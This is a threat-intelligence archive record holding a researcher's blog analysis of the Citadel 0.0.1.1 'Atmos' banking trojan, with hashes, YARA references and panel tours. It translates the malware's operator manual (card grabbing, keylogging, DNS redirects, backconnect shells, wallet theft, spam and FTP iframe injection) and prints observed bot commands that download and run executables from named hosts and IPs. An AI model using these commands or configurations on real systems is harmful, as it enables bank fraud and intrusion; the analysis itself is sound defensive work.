{
	"id": "451829dd-b693-439d-af06-36fe4ff68250",
	"created_at": "2026-04-06T00:16:49.408564Z",
	"updated_at": "2026-04-10T03:24:18.080781Z",
	"deleted_at": null,
	"sha1_hash": "7cdcd3e1ab41cbd98f723dab0c1025e9a9d25aaf",
	"title": "Citadel 0.0.1.1 (Atmos)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5868609,
	"plain_text": "Citadel 0.0.1.1 (Atmos)\r\nArchived: 2026-04-05 20:01:03 UTC\r\nGuys of JPCERT, 有難う御座います！\r\nReleased an update to their Citadel decrypter to make it compatible with 0.0.1.1 sample.\r\nCitadel 0.0.1.1 don't have a lot of documentation, so time as come to talk about it.\r\nPersonally i know this malware under the name 'Atmos' (be ready for name war in 3,2,1...)\r\n  The first sample i was aware is the one spotted by tilldenis here in jully 2015.\r\nI re-observed this campaign in november 2015 with the same 'usca'.\r\nYou can find a technical description of the product here: http://pastebin.com/raw/cAqbrqAS\r\nHere is a small part translated to English related to configuration and commands:\r\n3. Configuration\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 1 of 58\n\nurl_config1-10 [up to 10 links to configuration files; 1 main for your web admin panel and 9 spare ones. To save\r\nthe resources, use InterGate button in the builder to place config files on different links without setting up admin\r\npanel. Spare configs will be requested if the main one is not available during first EXE launch. Don't forget to put\r\nEXE and config files in 'files/' folder]\r\ntimer_config 4 9\r\n[Config file refresh timer in minutes | Retry interval]\r\ntimer_logs 3 6 [Logs upload timer in minutes | Retry in _ minutes]\r\ntimer_stats 4 8 [New command receiving and statistics upload timer in minutes | Retry in _ minutes]\r\ntimer_modules 4 9 [Additional configuration files receiving timer | Retry in _ minutes. 
Recommended to use the\r\nsame setting as in timer_config]\r\ntimer_autoupdate 8 [EXE file renewal timer in hours]\r\ninsidevm_enable 0/1 [Enable execution in virtual machine: 1 - yes | 0 - no]\r\ndisable_antivirus 0/1 [1 - Disable built-in 'AntiVirus' that allows to delete previous version of Zeus/Citadel/Citra\r\nafter EXE launch | 0 - leave enabled (recommended)]\r\ndisable_httpgrabber 0/1 [1 - Disable http:// mask grabber in IE | 0 - Enable http:// mask grabber in IE]\r\nenable_luhn10_get 0/1 [Enable CC grabber in GET-requests http/https]\r\nremove_certs 0/1 [Enable certificate deletion in IE storage]\r\nreport_software 0/1 [1 - Enable stats collection for Installed Software, Firewall version, Antivirus version | 0 -\r\nDisable]\r\ndisable_tcpserver 0/1 [1 - Enable opening SOCKS5 port (not Backconnect!) | 0 - Disable]\r\nenable_luhn10_post 0/1 [Enable CC grabber in POST-requests http/https]\r\ndisable_cookies 0/1 [1 - Disable IE/FF cookies-storage upload | 0 - Enable | use_module_ffcookie - duplicates the\r\nsame]\r\nfile_webinjects \"injects.txt\" [File containing injects. Installed right after successful config files installation.\r\nRenewal timer is set in timer_config]\r\nurl_webinjects \"localhost/file.php\" [Path to 'file.php' file. Feature of 'Web-Injects' section for remote instant inject\r\nloading]\r\nAdvancedConfigs [Links to backup configuration files. Works if !bot is already installed on the system! and first\r\nurl_config is no longer accessible]\r\nentry \"WebFilters\" [Set of different filters for URLs: video(# character), screenshot(single @ character -\r\nscreenshot sequence after a click in the active zone. double @ character '@@' - Full size screenshot), ignore (!\r\ncharacter), POST requests logging (P character), GET request logging (G character)]\r\nentry HttpVipUrls [URL blacklist. By default the following masks are NOT written to the logs \"facebook*\"\r\n\"*twitter*\", \"*google*\". 
Adding individual lines with these masks will enable logging for them again]\r\nentry \"DnsFilters\" [System level DNS redirect, mask example - *bankofamerica.com*=159.45.66.100. Now\r\nwhen going to bankofamerica.com - wellsfargo.com will be displayed. Blocking AV sites is not recommended, to\r\navoid triggering pro-active defenses]\r\nentry \"CmdList\" [List of system commands to run after launch and upload to the server]\r\nentry \"Keylogger\" [List of process names for KeyLogger. Time parameter defines the time to work in hours after\r\nthe process initialization]\r\nentry \"Video\" [Video recording settings | x_scale/y_scale - video resolution | fps - frames per second, 1 to 5 | kbs - frame refresh rate, 5 to 60 | cpu 0-16 CPU loading | time - time to record in seconds | quality 0-100 - picture\r\nquality]\r\nentry \"Videologger\" - [processes \"\" - list of processes to trigger video recording. Possible to use masks, for\r\nexample calc.exe or *calc*]\r\nentry \"MoneyParser\" [Balance grabber settings | include \"account,bank,balance\" - enable balance parsing if\r\nhttps:// page contains one of the following key words. | exclude \"casino,poker,game\" - do NOT perform parsing if\r\none of the following words is found]\r\nentry \"FileSearch\" [File search by given mask. The report will be stored in 'File Hunter' folder. Keywords can be\r\na list of files or patterns ** to search for on the disk. For example, multibit.exe will search for exact match on\r\nfilename.fileextension, *multibit* will report on anything found matching this pattern. | excludes_name - exclude\r\nfilenames/fileextensions from search. excludes_path - exclude system directories macros, like, Windows/Program\r\nFiles, etc | minimum_year - file creation/change date offset. The search task is always on. 
Remove all the\r\nparameters from this section to disable it.]\r\nentry \"NetScan\" [hostname \"host-to-scan.com\" - list of local/remote IP addresses to scan. scantype \"0\" - sets the\r\nIP address range, for example, scantype \"0\" scans a single IP in the 'hostname', scantype \"1\" creates a full scan of\r\nclass C network 10.10.10.0-255, scantype \"2\" creates a full scan of class B network 10.10.0-255.0-255]\r\nExample 1 {hostname \"10.10.0-255.0-255\" addrtype \"ipv4\" porttype \"tcp\" ports \"1-5000\" scantype \"2\"}\r\nExample 2 {hostname \"10.10.1.0-255\" addrtype \"ipv4\" porttype \"tcp\" ports \"1-5000\" scantype \"1\"}]\r\nentry \"WebMagic\" [Local WebProxySrv, web server with its own storage. Allows to read and write bot\r\nparameters directly, for example, when using injects. This saves time and resources since it doesn't generate\r\nadditional remote requests for different scripts that are generally detected by banks anti-tampering controls. It also\r\nallows to bypass browser checking when requesting https:// resource hosted remotely and to create backconnect\r\nconnection. Full settings description is located in F.A.Q section]\r\n4. Commands\r\nuser_execute \u003curl\u003e [execute given file]\r\nuser_execute \u003curl\u003e -f [execute given file, manual bot update that overwrites the current version]\r\nuser_cookies_get [Get IE cookies]\r\nuser_cookies_remove [Remove IE cookies]\r\nuser_certs_get [Get .p12 certificates. 
Password: pass]\r\nuser_certs_remove [Remove certificates]\r\nuser_homepage_set \u003curl\u003e [Set browser home page]\r\nuser_flashplayer_get [Get user's .sol files]\r\nuser_flashplayer_remove [Remove user's .sol files]\r\nurl_open \u003curl\u003e [open given URL in a browser]\r\ndns_filter_add \u003chostname\u003e \u003cip\u003e [Add domain name for redirect(blocking) *bankofamerica.com* 127.0.0.1]\r\ndns_filter_remove \u003curl\u003e [Remove domain name from redirect(blocking)]\r\nuser_destroy [Corrupt system vital files and reboot the system. Requires elevated privileges]\r\nuser_logoff [Logoff currently logged in user]\r\nos_reboot [Reboot the host]\r\nos_shutdown [Shutdown the host]\r\nbot_uninstall [Remove bot file and uninstall it]\r\nbot_update \u003curl\u003e [Update bot configuration file. Requires the same crypt to be used. The path is set in\r\nurl_config]\r\nbot_bc_add socks \u003cip\u003e \u003cport\u003e [Connect Bot \u003e Backconnect Server \u003e Socks5 | Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for\r\nProxifier/Browser...]\r\nbot_bc_add vnc \u003cip\u003e \u003cport\u003e [Connect Bot \u003e Backconnect Server \u003e VNC Remote Display | Run\r\nbackconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required\r\nfor UltraVNC client]\r\nbot_bc_add cmd \u003cip\u003e \u003cport\u003e [Connect Bot \u003e Backconnect Server \u003e Remote Shell | Run backconnect.exe listen\r\n-cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for telnet/putty client]\r\nbot_bc_remove \u003cservice\u003e \u003cip\u003e \u003cport\u003e [Disconnect from the bot and hide connections from 'netstat' output]\r\nclose_browsers [close all browser processes]\r\nAnd one part related to some new features:\r\nQ: How does Mailer 
work?\r\nA: This feature allows you to create mass-email campaigns using standard PHP tools.\r\nFor this feature to work correctly you need to download the script [Download Script] and put it in www-root\r\ndirectory on one of the hosts that will be used to perform the mass-email campaign - make sure you turn off the\r\nfollowing in php.ini; magic_quotes_gpc = Off and safe_mode = Off\r\nAfter that press [ Config ] and fill in [Master E-Mail (for checkup) parameters: \"name ; email\" Your email for\r\nchecking] and Mailer-script URL: http://www.host.com/mailer.php\r\nIt's possible to create a campaign using an email address list collected by a Bot using \"For BotID\" button or a new\r\nlist name;email\r\nMacros are supported in Subject/Body/Attach.\r\n{name} - Receiver name | {email} - Receiver E-mail | {random} - random chars | {rand0m} - random long\r\nnumber\r\nRecommendation: To avoid being blocked by spam-filters use macro name@{hostname} in Sender (\"email\" or\r\n\"name ; email\") field - in this case the real domain name of the sending host will be used and your emails will not\r\nend up in Spam folder.\r\nQ: How to work with File Hunter feature?\r\nA: This feature allows you to work with files on the bot: get list of files matching the parameters specified under\r\nconfig entry \"FileSearch\", track file updates, autoupload files and replace files on the bot.\r\nCustom Download - allows you to download any file from a bot by BotID, given that a full path to the file is\r\nknown. This will work even if the file is not specified under \"FileSearch\" config entry.\r\nAuto download - uploads files with a given mask without a need to specify BotID. Bot will execute the upload as\r\nsoon as search conditions are given and the file found. This will work even if the file is not specified under\r\n\"FileSearch\" config entry.\r\nBe careful using File Hunter to modify any files on the bot. 
Its main purpose is to grab *coin\r\nfiles (multibit.dat/litecoin.dat...)\r\nUse mouse right-click to access context menu for file list.\r\nQ: Short manual for FTP Iframer\r\nA: As in the case with 'Mailer', for this feature to work correctly you need to download the iframer script\r\n[Download Script] and put it in www-root directory on one of the hosts that will be used to perform the mass-email campaign - make sure you turn off the following in php.ini; magic_quotes_gpc = Off and safe_mode = Off\r\nNext, create configuration options by pressing on [ Configuration ]\r\nSpecify the script URL in URL field\r\nWorking mode: Just checking [ Will check the validity of FTP accounts found in the logs ]\r\nInject: [Mode: \"ON\"]\r\nInject method: Smart/Add/Overwrite [ Smart - will re-add the inject in case it was detected and deleted. / Add -\r\niframe code will be added to the end of the file before \u003c/body\u003e\u003c/html\u003e]\r\nLookup depth: [ File search level on ftp-host. For example, in the following structure FTP Connection \u003e\r\npublic_html(1) \u003e images(2) \u003e gif(3)....]\r\nNext, perform 'Accounts search' and 'Run tasks'. The statistics and results will be available after a few minutes.\r\nThe script will be working in cron-mode after the first execution, so there is no need to keep the page open.\r\nQ: Main functions and methods of \"Neuromodel\"\r\nA: Neuromodel allows you to perform complex analysis of your botnet: identifying best bots, upload success\r\nrates. You can build a research matrix that includes a list of bots and evaluate them against specified criteria; the\r\nresult will be a score calculated for each bot.\r\nEach research matrix can contain a number of evaluation criteria. 
For example, you need to search the logs for the\r\nfollowing data: Bank Acc + CC or Bank Acc + ISP E-mail\r\nCreate profile first and then plan the task based on required criteria.\r\nTask - \"Find bots that logged into http://www.bankofamerica.com id=* in the last 30 days and where McAfee is\r\ninstalled. Assign X score if the search criteria match\"\r\nCreating criteria:\r\n1) { name: BOA LOGIN | criteria: HTTP data POST | URL masks: htt*://www.bankofamerica.com/* | POST data\r\nmasks: id=* | days limit: 30 | score: 1 | static method, trigger condition: No \u003c 1 }\r\n2) { name: AVCheck | criteria: installed software | software name mask: McAfee* | days limit: 30 | score: 1 | trigger\r\ncondition: No \u003c 1 }\r\nStatic method is used to summarize the results.\r\n* **No**: simple summary. Each successful criteria match adds the specified score to the bot. More matches = bigger\r\nscore.\r\nExample 1: if it found 180 reports matching the criteria and the score is 2 then the final score will be '180*2'\r\nExample 2: if 'Login to bankofamerica' criteria is set to \"\u003e=\" \"3\" on average a day then the score will be added\r\nonly for the last days specified in 'Days' parameter.\r\nDetailed: if in the last days specified in 'Days' parameter the 'Login to bankofamerica' criteria was matched more\r\nthan 3 times on average then the bots reported will be given the score points.\r\n* **Sum**: summary of produced reports.\r\nScore 'Points' will be added if the amount of reports satisfying the search criteria complies with trigger condition.\r\nFor example, if we have `reports_count=180` and `Points=2` and trigger condition is `\u003e= 180` then the score is\r\n+2.\r\n* **Days**: active days summary: days containing the reports.\r\nScore will be added if the amount of reports satisfying the search criteria complies with trigger condition.\r\nFor example, if we have reports from day before 
yesterday, yesterday and today and trigger condition is set to `\u003e= 3` then the scores will be added.\r\n* **Avg/Day**: Average/Day: average number of reports in the last 24 hours\r\n* **Avg/Week**: Average/Week: average number of reports per week\r\n* **Days/Week**: average number of active days per week\r\nAnother example, search for inactive accounts:\r\n\"Find the bots regardless of their scores that logged into USBank in the last 21 days no more than 3 times - no\r\nfilters or criteria are applied\"\r\n1) { URL = https://onlinebanking.usbank.com/Auth/Login/Login* | HTTP URL visit | days limit = 21 | Login no\r\nmore than 3 times: e.g. login \u003c=3. Meaning, if found \u003c=3 reports for this criteria — add 1 to the score. | SUM()\r\n\u003c=3 , 1 score }\r\nFull criteria list is below:\r\nCondition using date/time of the first report received from the bot.\r\nCondition using date/time of the last report received from the bot.\r\nCondition using average online time of the bot per week or per hour.\r\nCondition using a type of the report or its content:\r\n\u003ePresence/Lack of LUHN10(CC)\r\n\u003ePresence/Lack of ISP email address (pop3 or web-link)\r\n\u003ePresence/Lack of FTP accounts\r\n\u003eSearch by key words\r\nCondition using \"Installed Software\" reports, allows you to check for a particular software installed on the bot.\r\nCondition using \"CMD\" reports, allows to use particular keywords.\r\nCondition using visits to one or more particular URLs.\r\nCondition using POST variables.\r\nMinus some absolute nonsense in the description of Avg/Day, Avg/Week and Days/Week.\r\nThe author is a fecking lunatic trying to explain things that only he understands :)\r\nThanks to Malwageddon for the translation help.\r\nNow.. 
take a free tour in the infrastructure.\r\nLogin:\r\nDashboard:\r\nRU and UA flags, united forever :)\r\nexe configuration:\r\nOperating system:\r\nSoftware:\r\nFirewall:\r\nAV:\r\nSearch:\r\nBots:\r\nLegend:\r\nFull information:\r\nWebInject:\r\nReported errors:\r\nNew group:\r\nEdit a webinject:\r\nWebinjects for the group 'Canada':\r\nUS:\r\nEdit a webinject:\r\nScript:\r\nScript edit:\r\nSome script samples:\r\ntokenspy_update tokenspy-config.json\r\nhvnc_start 176.9.174.237 29223\r\nbot_bc_add vnc\r\nbot_bc_add socks 176.9.174.237 37698\r\nuser_execute http://iguana58.ru/plugins/system/anticopy/ammy.exe\r\ntransfer\r\nuser_destroy\r\nuser_execute http://iguana58.ru/plugins/system/anticopy/adobe.exe\r\nuser_ftpclients_get\r\nuser_execute htxp://iguana58.ru/plugins/system/anticopy/adobe.exe\r\nuser_execute htxp://mareikes.com/wp-includes/pomo/svhost.exe -f\r\nuser_execute htxp://mareikes.com/wp-includes/pomo/server.exe\r\nuser_execute htxp://mareikes.com/wp-includes/pomo/ammy.exe\r\nuser_execute http://tehnoart.co/sr.exe -f\r\nuser_execute 
http://3dmaxkursum.net/tmp/sys/config.exe\r\nuser_execute http://coasttransit.com/wp-content/gallery/gulfport-transit-center/thumbs/htasees.exe\r\n• dns: 1 ›› ip: 185.4.73.33 - adress: IGUANA58.RU\r\n• dns: 1 ›› ip: 176.9.24.49 - adress: MAREIKES.COM\r\n• dns: 1 ›› ip: 107.180.26.93 - adress: TEHNOART.CO\r\n• dns: 1 ›› ip: 94.73.144.210 - adress: 3DMAXKURSUM.NET\r\n• dns: 1 ›› ip: 184.168.47.225 - adress: COASTTRANSIT.COM\r\nSocks:\r\nVNC:\r\nExample of infected endpoints:\r\nConfig:\r\nBackconnect logs:\r\nFiles:\r\nSHA1: 9EA4041C41C3448E5A9D00EEA9DACB9E11EBA6C0\r\nbcservice.ini:\r\n[bcservice]\r\nclient_starting_port=200\r\nbots_port=30\r\nreboot_every_m=10\r\nTrashed binaries:\r\nSHA1: 987B468DB8AA400171E5365E89C3120F13F728EE\r\nAtmos builder:\r\nSHA1: D3F992DCDBB0DF54C4A383163172F69A1CA967AE\r\nServer logs start on 3 Oct 2015:\r\nTokenSpy:\r\nWith a nice ring animation :)\r\nRule/test:\r\nSearch database:\r\nSearch list:\r\nSetup:\r\nWith a reference to Citadel.\r\nReport:\r\nFavorite reports:\r\nSearch in files:\r\nScreenshot:\r\nView videos:\r\nCMD 
parser:\r\nNeuromodel:\r\nEdit:\r\nLinks:\r\nBalance grabber:\r\nConfig:\r\nActivity:\r\nJabber notifier:\r\nNotes:\r\nCrypt exe:\r\nFTP iframer:\r\nConfig:\r\nThe iframe leads to a Keitaro TDS, which in turn leads to malware:\r\nThat's right, the second one is a Blackhole exploit kit.\r\nJérôme Segura of Malwarebytes has written about this one here: https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackhole-exploit-kit-resurfaces-in-live-attacks/\r\nThe first one is RIG exploit kit delivering Chthonic, targeting Russia and Ukraine.\r\nAs for update-flashplayer.ml and update-flash-security.ml, they lead to an iBanking download.\r\nSHA1: E536E23409EBF015C500D5799AD8C70787125E95\r\nCNC at templatehtml.ru\r\nTo get back on the original subject, here is the File Hunter:\r\nDownloaded:\r\nTrash:\r\nMailer:\r\nConfig:\r\nMail:\r\nInformation:\r\nOptions:\r\nJabber 
address:\r\nUser:\r\nUsers:\r\nDifferent admins with different rights:\r\nSome users have limited actions; for example, one guy had only access to the malware upload feature, probably to\r\nrefresh the crypt.\r\n6 users, including the master user, use Russian on the panel; the rest are configured in English.\r\nInstall:\r\nFiles:\r\nCC parser:\r\nWebinject server:\r\nDashboard:\r\nView:\r\nSettings:\r\nReplacer settings:\r\nChat:\r\nDrop:\r\nFakes:\r\nWebInject server 2:\r\nDashboard:\r\nCommand:\r\nLogs:\r\nCash list:\r\nStats:\r\nDrops:\r\nState stats:\r\nUser management:\r\nExport CSV:\r\nHelp:\r\n/s/ panel:\r\nShow infos:\r\nState stats:\r\nHelp:\r\n/s2/ panel:\r\n/s3/ panel:\r\nPony used by one member of the gang:\r\nBrowser logs:\r\nCitadel 0.0.1.1 
samples:\r\nDecrypted Citadel plugins:\r\nB3FDC0DAFA7C0A2076AB4D42317A0E0BAAF3BA78\r\n0B40F80C025C199F7D940BED572EA08ADE2D52F9\r\n3B004C68C32C13CAF7F9519B6F7868BF99771F30\r\nHidden VNC demo: https://www.youtube.com/watch?v=TDOZfalD_LY\r\nAtmos package:\r\n056709A96FE05793B3544ACB4413A9EF827DCEEF\r\nC1B79552B6F770D96B0A0C25C8C8FD87D6D629B9\r\nOther samples (not Atmos):\r\n02FFC98E2B5495E9C760BDA1D855DCA48A754243\r\nB7AE6D5026C776F123BFC9DAECC07BD872C927B4\r\n56B58A03ADB175886FBCA449CDB73BE2A82D6FEF\r\nSome other Atmos samples (courtesy of Kafeine):\r\n8BBFA46A2ADCDF0933876EF920826AB0B02FCC18\r\nDAABF498242018E3EE16513E2A789D397141C7AC\r\n04F599D501EA656FB995D1BFA4367F5939631881\r\nYou can find my YARA rules for mitigating Atmos here: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Atmos.yar\r\nThe Google Chrome injections appear to work from v25.0.1349.2 (2012/12/06) until v43.0.2357.134 (2015/07/14).\r\nFun thing: I got correlations with a CoreBot sample and the webinjects they used.\r\nch_new, wf2, cu_main, citi_new, ebay_new, [...]\r\nSame kind of campaign inside their panels and the same custom file names.\r\nIf you are looking for more info about Citadel, the community did great work 
here\r\nhttp://www.kernelmode.info/forum/viewtopic.php?f=16\u0026t=1465\r\nPerseverance is power.\r\nSource: http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"http://www.xylibox.com/2016/02/citadel-0011-atmos.html"
	],
	"report_names": [
		"citadel-0011-atmos.html"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434609,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7cdcd3e1ab41cbd98f723dab0c1025e9a9d25aaf.pdf",
		"text": "https://archive.orkl.eu/7cdcd3e1ab41cbd98f723dab0c1025e9a9d25aaf.txt",
		"img": "https://archive.orkl.eu/7cdcd3e1ab41cbd98f723dab0c1025e9a9d25aaf.jpg"
	}
}